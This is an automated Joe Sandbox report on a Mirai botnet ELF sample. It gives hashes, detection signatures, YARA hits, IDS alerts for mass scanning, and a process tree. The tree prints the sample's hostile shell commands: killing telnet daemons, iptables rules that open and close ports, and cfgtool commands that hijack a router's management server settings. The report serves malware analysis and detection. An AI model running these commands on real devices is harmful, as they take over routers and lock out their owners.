Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
bin.sh.elf

Overview

General Information

Sample name:bin.sh.elf
Analysis ID:1569630
MD5:6e7a24e5cf84f990d280be8fcacbea44
SHA1:4191645bab28986b97833fcbbcb60155ddfc8f76
SHA256:22fa811e8ed03a9accfc16313b2e75a7419c10e652987b5348ef591012bac712
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Reads system information from the proc file system
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1569630
Start date and time:2024-12-06 00:36:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 34s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:bin.sh.elf
Detection:MAL
Classification:mal100.spre.troj.evad.linELF@0/486@73/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Reached maximum number of 1000 Suricata alerts, please consult the 'Suricata Logs'
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: bin.sh.elf
Command:/tmp/bin.sh.elf
PID:6237
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:telnetd: no process found
utelnetd: no process found
scfgmgr: no process found
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
/bin/sh: 1: cfgtool: not found
/bin/sh: 1: cfgtool: not found
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
  • system is lnxubuntu20
  • bin.sh.elf (PID: 6237, Parent: 6161, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/bin.sh.elf
    • bin.sh.elf New Fork (PID: 6239, Parent: 6237)
      • bin.sh.elf New Fork (PID: 6241, Parent: 6239)
        • sh (PID: 6243, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 6250, Parent: 6243)
          • killall (PID: 6250, Parent: 6243, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall -9 telnetd utelnetd scfgmgr
        • bin.sh.elf New Fork (PID: 6255, Parent: 6241)
          • sh (PID: 6271, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 49999 -j ACCEPT"
            • sh New Fork (PID: 6273, Parent: 6271)
            • iptables (PID: 6273, Parent: 6271, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 49999 -j ACCEPT
          • sh (PID: 6278, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 49999 -j ACCEPT"
            • sh New Fork (PID: 6280, Parent: 6278)
            • iptables (PID: 6280, Parent: 6278, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 49999 -j ACCEPT
          • sh (PID: 6281, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 49999 -j ACCEPT"
            • sh New Fork (PID: 6283, Parent: 6281)
            • iptables (PID: 6283, Parent: 6281, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 49999 -j ACCEPT
          • sh (PID: 6285, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 49999 -j ACCEPT"
            • sh New Fork (PID: 6287, Parent: 6285)
            • iptables (PID: 6287, Parent: 6285, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 49999 -j ACCEPT
          • sh (PID: 6288, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 49999 -j ACCEPT"
            • sh New Fork (PID: 6290, Parent: 6288)
            • iptables (PID: 6290, Parent: 6288, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 49999 -j ACCEPT
          • sh (PID: 6291, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 49999 -j ACCEPT"
            • sh New Fork (PID: 6293, Parent: 6291)
            • iptables (PID: 6293, Parent: 6291, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 49999 -j ACCEPT
          • sh (PID: 6294, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 49999 -j ACCEPT"
            • sh New Fork (PID: 6302, Parent: 6294)
            • iptables (PID: 6302, Parent: 6294, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 49999 -j ACCEPT
          • sh (PID: 6303, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 49999 -j ACCEPT"
            • sh New Fork (PID: 6308, Parent: 6303)
            • iptables (PID: 6308, Parent: 6303, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 49999 -j ACCEPT
        • sh (PID: 6310, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 6315, Parent: 6310)
          • iptables (PID: 6315, Parent: 6310, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • sh (PID: 6316, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 6318, Parent: 6316)
          • iptables (PID: 6318, Parent: 6316, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • sh (PID: 6319, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 6324, Parent: 6319)
          • iptables (PID: 6324, Parent: 6319, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • sh (PID: 6327, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 6350, Parent: 6327)
          • iptables (PID: 6350, Parent: 6327, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • sh (PID: 6351, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • sh (PID: 6356, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • sh (PID: 6361, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 6366, Parent: 6361)
          • iptables (PID: 6366, Parent: 6361, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • sh (PID: 6369, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 6374, Parent: 6369)
          • iptables (PID: 6374, Parent: 6369, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • sh (PID: 6375, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 6380, Parent: 6375)
          • iptables (PID: 6380, Parent: 6375, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • sh (PID: 6381, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 6386, Parent: 6381)
          • iptables (PID: 6386, Parent: 6381, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • sh (PID: 6387, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 6392, Parent: 6387)
          • iptables (PID: 6392, Parent: 6387, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • sh (PID: 6393, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 6398, Parent: 6393)
          • iptables (PID: 6398, Parent: 6393, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • sh (PID: 6399, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 6404, Parent: 6399)
          • iptables (PID: 6404, Parent: 6399, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • sh (PID: 6405, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 6410, Parent: 6405)
          • iptables (PID: 6410, Parent: 6405, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • sh (PID: 6411, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 6416, Parent: 6411)
          • iptables (PID: 6416, Parent: 6411, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • sh (PID: 6417, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 6422, Parent: 6417)
          • iptables (PID: 6422, Parent: 6417, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • sh (PID: 6423, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 6428, Parent: 6423)
          • iptables (PID: 6428, Parent: 6423, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • sh (PID: 6429, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 6434, Parent: 6429)
          • iptables (PID: 6434, Parent: 6429, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • sh (PID: 6439, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 1027 -j ACCEPT"
          • sh New Fork (PID: 6443, Parent: 6439)
          • iptables (PID: 6443, Parent: 6439, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --destination-port 1027 -j ACCEPT
        • sh (PID: 6446, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 1027 -j ACCEPT"
          • sh New Fork (PID: 6448, Parent: 6446)
          • iptables (PID: 6448, Parent: 6446, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --source-port 1027 -j ACCEPT
        • sh (PID: 6449, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 1027 -j ACCEPT"
          • sh New Fork (PID: 6454, Parent: 6449)
          • iptables (PID: 6454, Parent: 6449, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 1027 -j ACCEPT
        • sh (PID: 6455, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 1027 -j ACCEPT"
          • sh New Fork (PID: 6457, Parent: 6455)
          • iptables (PID: 6457, Parent: 6455, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 1027 -j ACCEPT
        • sh (PID: 6458, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 1027 -j ACCEPT"
          • sh New Fork (PID: 6460, Parent: 6458)
          • iptables (PID: 6460, Parent: 6458, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --dport 1027 -j ACCEPT
        • sh (PID: 6461, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 1027 -j ACCEPT"
          • sh New Fork (PID: 6463, Parent: 6461)
          • iptables (PID: 6463, Parent: 6461, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --sport 1027 -j ACCEPT
        • sh (PID: 6464, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 1027 -j ACCEPT"
          • sh New Fork (PID: 6469, Parent: 6464)
          • iptables (PID: 6469, Parent: 6464, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --dport 1027 -j ACCEPT
        • sh (PID: 6470, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 1027 -j ACCEPT"
          • sh New Fork (PID: 6475, Parent: 6470)
          • iptables (PID: 6475, Parent: 6470, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 1027 -j ACCEPT
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
bin.sh.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
    bin.sh.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      bin.sh.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        bin.sh.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          bin.sh.elfLinux_Trojan_Mirai_5c62e6b2unknownunknown
          • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              /usr/networksJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                  /usr/networksLinux_Trojan_Mirai_5c62e6b2unknownunknown
                  • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
                  Click to see the 2 entries
                  SourceRuleDescriptionAuthorStrings
                  6239.1.00007f42f0060000.00007f42f006a000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                    6239.1.00007f42f0060000.00007f42f006a000.rw-.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                      6237.1.00007f42f0060000.00007f42f006a000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                        6237.1.00007f42f0060000.00007f42f006a000.rw-.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                          6237.1.00007f42f0017000.00007f42f0058000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
                            Click to see the 17 entries
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-06T00:37:05.847908+010020292151Attempted Administrator Privilege Gain192.168.2.235971639.116.5.1358080TCP
                            2024-12-06T00:37:05.850147+010020292151Attempted Administrator Privilege Gain192.168.2.2341790169.253.87.24280TCP
                            2024-12-06T00:37:05.851260+010020292151Attempted Administrator Privilege Gain192.168.2.235081420.138.27.15980TCP
                            2024-12-06T00:37:05.857232+010020292151Attempted Administrator Privilege Gain192.168.2.2346736104.212.159.1348080TCP
                            2024-12-06T00:37:05.858338+010020292151Attempted Administrator Privilege Gain192.168.2.2336750214.127.3.3780TCP
                            2024-12-06T00:37:05.860219+010020292151Attempted Administrator Privilege Gain192.168.2.2344516129.222.135.498080TCP
                            2024-12-06T00:37:05.862087+010020292151Attempted Administrator Privilege Gain192.168.2.233813848.209.236.16480TCP
                            2024-12-06T00:37:05.863895+010020292151Attempted Administrator Privilege Gain192.168.2.235884273.149.43.25380TCP
                            2024-12-06T00:37:05.864278+010020292151Attempted Administrator Privilege Gain192.168.2.234525243.10.138.1868080TCP
                            2024-12-06T00:37:05.866901+010020292151Attempted Administrator Privilege Gain192.168.2.2352382187.208.34.3880TCP
                            2024-12-06T00:37:05.868751+010020292151Attempted Administrator Privilege Gain192.168.2.2354204161.159.158.2518080TCP
                            2024-12-06T00:37:05.870253+010020292151Attempted Administrator Privilege Gain192.168.2.2356896145.217.58.1498080TCP
                            2024-12-06T00:37:05.871002+010020292151Attempted Administrator Privilege Gain192.168.2.235449479.72.226.1288080TCP
                            2024-12-06T00:37:05.877738+010020292151Attempted Administrator Privilege Gain192.168.2.2340472197.142.218.1368080TCP
                            2024-12-06T00:37:05.879605+010020292151Attempted Administrator Privilege Gain192.168.2.23564489.106.14.12380TCP
                            2024-12-06T00:37:05.880717+010020292151Attempted Administrator Privilege Gain192.168.2.2354806121.86.29.24980TCP
                            2024-12-06T00:37:05.885547+010020292151Attempted Administrator Privilege Gain192.168.2.233501245.231.135.1898080TCP
                            2024-12-06T00:37:05.888905+010020292151Attempted Administrator Privilege Gain192.168.2.2355996181.78.116.238080TCP
                            2024-12-06T00:37:05.891154+010020292151Attempted Administrator Privilege Gain192.168.2.235077652.35.25.2080TCP
                            2024-12-06T00:37:05.891529+010020292151Attempted Administrator Privilege Gain192.168.2.235308663.90.139.1028080TCP
                            2024-12-06T00:37:05.895644+010020292151Attempted Administrator Privilege Gain192.168.2.2348816103.159.239.638080TCP
                            2024-12-06T00:37:05.897133+010020292151Attempted Administrator Privilege Gain192.168.2.235254419.154.130.11780TCP
                            2024-12-06T00:37:05.897870+010020292151Attempted Administrator Privilege Gain192.168.2.2334596128.12.140.2468080TCP
                            2024-12-06T00:37:05.900124+010020292151Attempted Administrator Privilege Gain192.168.2.233513038.189.25.21780TCP
                            2024-12-06T00:37:05.901238+010020292151Attempted Administrator Privilege Gain192.168.2.233287053.223.145.17480TCP
                            2024-12-06T00:37:05.902729+010020292151Attempted Administrator Privilege Gain192.168.2.234599283.191.83.2348080TCP
                            2024-12-06T00:37:05.903097+010020292151Attempted Administrator Privilege Gain192.168.2.2350074128.100.55.448080TCP
                            2024-12-06T00:37:05.904605+010020292151Attempted Administrator Privilege Gain192.168.2.235913825.203.243.1028080TCP
                            2024-12-06T00:37:05.906459+010020292151Attempted Administrator Privilege Gain192.168.2.2342796210.76.1.25380TCP
                            2024-12-06T00:37:05.912850+010020292151Attempted Administrator Privilege Gain192.168.2.234351639.11.173.15580TCP
                            2024-12-06T00:37:05.913978+010020292151Attempted Administrator Privilege Gain192.168.2.2339156151.36.87.5280TCP
                            2024-12-06T00:37:05.915469+010020292151Attempted Administrator Privilege Gain192.168.2.2348966101.172.124.15580TCP
                            2024-12-06T00:37:05.917699+010020292151Attempted Administrator Privilege Gain192.168.2.234133473.18.143.20480TCP
                            2024-12-06T00:37:05.927676+010020292151Attempted Administrator Privilege Gain192.168.2.2356482133.9.23.2180TCP
                            2024-12-06T00:37:05.928420+010020292151Attempted Administrator Privilege Gain192.168.2.234189613.194.80.1898080TCP
                            2024-12-06T00:37:05.943403+010020292151Attempted Administrator Privilege Gain192.168.2.2351362210.92.63.9080TCP
                            2024-12-06T00:37:05.943765+010020292151Attempted Administrator Privilege Gain192.168.2.2350600125.230.87.13880TCP
                            2024-12-06T00:37:06.936116+010020292151Attempted Administrator Privilege Gain192.168.2.235022881.210.236.23880TCP
                            2024-12-06T00:37:06.937220+010020292151Attempted Administrator Privilege Gain192.168.2.235388261.221.193.11580TCP
                            2024-12-06T00:37:06.939059+010020292151Attempted Administrator Privilege Gain192.168.2.2350262202.51.201.3780TCP
                            2024-12-06T00:37:06.943117+010020292151Attempted Administrator Privilege Gain192.168.2.234935471.164.37.2128080TCP
                            2024-12-06T00:37:06.945347+010020292151Attempted Administrator Privilege Gain192.168.2.2357396132.109.208.1038080TCP
                            2024-12-06T00:37:06.945724+010020292151Attempted Administrator Privilege Gain192.168.2.2339304181.25.123.2358080TCP
                            2024-12-06T00:37:16.851214+010020292151Attempted Administrator Privilege Gain192.168.2.234614250.129.165.88080TCP
                            2024-12-06T00:37:16.853071+010020292151Attempted Administrator Privilege Gain192.168.2.233810450.210.105.428080TCP
                            2024-12-06T00:37:16.855611+010020292151Attempted Administrator Privilege Gain192.168.2.2340404139.210.155.19280TCP
                            2024-12-06T00:37:16.857051+010020292151Attempted Administrator Privilege Gain192.168.2.2336152175.171.246.25080TCP
                            2024-12-06T00:37:16.857763+010020292151Attempted Administrator Privilege Gain192.168.2.2337144157.232.42.1418080TCP
                            2024-12-06T00:37:16.860309+010020292151Attempted Administrator Privilege Gain192.168.2.233648264.132.168.648080TCP
                            2024-12-06T00:37:16.861021+010020292151Attempted Administrator Privilege Gain192.168.2.233467215.208.50.25080TCP
                            2024-12-06T00:37:16.866846+010020292151Attempted Administrator Privilege Gain192.168.2.2353162140.22.65.768080TCP
                            2024-12-06T00:37:16.867571+010020292151Attempted Administrator Privilege Gain192.168.2.234243494.215.141.548080TCP
                            2024-12-06T00:37:16.868666+010020292151Attempted Administrator Privilege Gain192.168.2.2344886173.106.78.3580TCP
                            2024-12-06T00:37:16.871563+010020292151Attempted Administrator Privilege Gain192.168.2.2357842196.158.249.16880TCP
                            2024-12-06T00:37:16.872317+010020292151Attempted Administrator Privilege Gain192.168.2.23537209.23.74.6480TCP
                            2024-12-06T00:37:16.879124+010020292151Attempted Administrator Privilege Gain192.168.2.235587056.100.184.7880TCP
                            2024-12-06T00:37:16.887475+010020292151Attempted Administrator Privilege Gain192.168.2.234567075.46.156.12180TCP
                            2024-12-06T00:37:16.910089+010020292151Attempted Administrator Privilege Gain192.168.2.235562481.101.181.758080TCP
                            2024-12-06T00:37:16.911217+010020292151Attempted Administrator Privilege Gain192.168.2.234383684.191.42.5580TCP
                            2024-12-06T00:37:16.913431+010020292151Attempted Administrator Privilege Gain192.168.2.235746622.188.96.9780TCP
                            2024-12-06T00:37:16.915296+010020292151Attempted Administrator Privilege Gain192.168.2.2338838191.59.214.13880TCP
                            2024-12-06T00:37:16.917148+010020292151Attempted Administrator Privilege Gain192.168.2.234579281.139.77.7680TCP
                            2024-12-06T00:37:16.921207+010020292151Attempted Administrator Privilege Gain192.168.2.2343440202.113.87.11180TCP
                            2024-12-06T00:37:16.924155+010020292151Attempted Administrator Privilege Gain192.168.2.2359242132.196.243.10480TCP
                            2024-12-06T00:37:16.925642+010020292151Attempted Administrator Privilege Gain192.168.2.233873496.170.47.1078080TCP
                            2024-12-06T00:37:16.928584+010020292151Attempted Administrator Privilege Gain192.168.2.233517016.77.80.2548080TCP
                            2024-12-06T00:37:16.941492+010020292151Attempted Administrator Privilege Gain192.168.2.233433297.104.12.2980TCP
                            2024-12-06T00:37:16.943322+010020292151Attempted Administrator Privilege Gain192.168.2.233617822.45.118.25080TCP
                            2024-12-06T00:37:16.944418+010020292151Attempted Administrator Privilege Gain192.168.2.2345448106.46.13.1508080TCP
                            2024-12-06T00:37:16.947353+010020292151Attempted Administrator Privilege Gain192.168.2.23425868.107.105.12080TCP
                            2024-12-06T00:37:16.949227+010020292151Attempted Administrator Privilege Gain192.168.2.233583854.118.74.418080TCP
                            2024-12-06T00:37:16.950675+010020292151Attempted Administrator Privilege Gain192.168.2.2340388154.211.50.528080TCP
                            2024-12-06T00:37:16.952526+010020292151Attempted Administrator Privilege Gain192.168.2.233608443.139.176.2188080TCP
                            2024-12-06T00:37:17.930506+010020292151Attempted Administrator Privilege Gain192.168.2.23373469.144.121.1028080TCP
                            2024-12-06T00:37:17.935707+010020292151Attempted Administrator Privilege Gain192.168.2.2349620133.45.42.638080TCP
                            2024-12-06T00:37:17.936820+010020292151Attempted Administrator Privilege Gain192.168.2.23500905.233.117.12080TCP
                            2024-12-06T00:37:17.941472+010020292151Attempted Administrator Privilege Gain192.168.2.2349234106.176.148.3380TCP
                            2024-12-06T00:37:19.604919+010020292151Attempted Administrator Privilege Gain192.168.2.2337220194.163.148.12580TCP
                            2024-12-06T00:37:27.848889+010020292151Attempted Administrator Privilege Gain192.168.2.2345692153.204.123.988080TCP
                            2024-12-06T00:37:27.924361+010020292151Attempted Administrator Privilege Gain192.168.2.234776694.134.232.20580TCP
                            2024-12-06T00:37:28.862512+010020292151Attempted Administrator Privilege Gain192.168.2.2352536174.193.163.938080TCP
                            2024-12-06T00:37:28.881708+010020292151Attempted Administrator Privilege Gain192.168.2.2357302111.190.5.13680TCP
                            2024-12-06T00:37:28.909985+010020292151Attempted Administrator Privilege Gain192.168.2.2335770209.123.202.12580TCP
                            2024-12-06T00:37:28.923426+010020292151Attempted Administrator Privilege Gain192.168.2.235692227.135.40.20680TCP
                            2024-12-06T00:37:28.926761+010020292151Attempted Administrator Privilege Gain192.168.2.2335456180.201.171.918080TCP
                            2024-12-06T00:37:28.935472+010020292151Attempted Administrator Privilege Gain192.168.2.2359038212.113.242.3280TCP
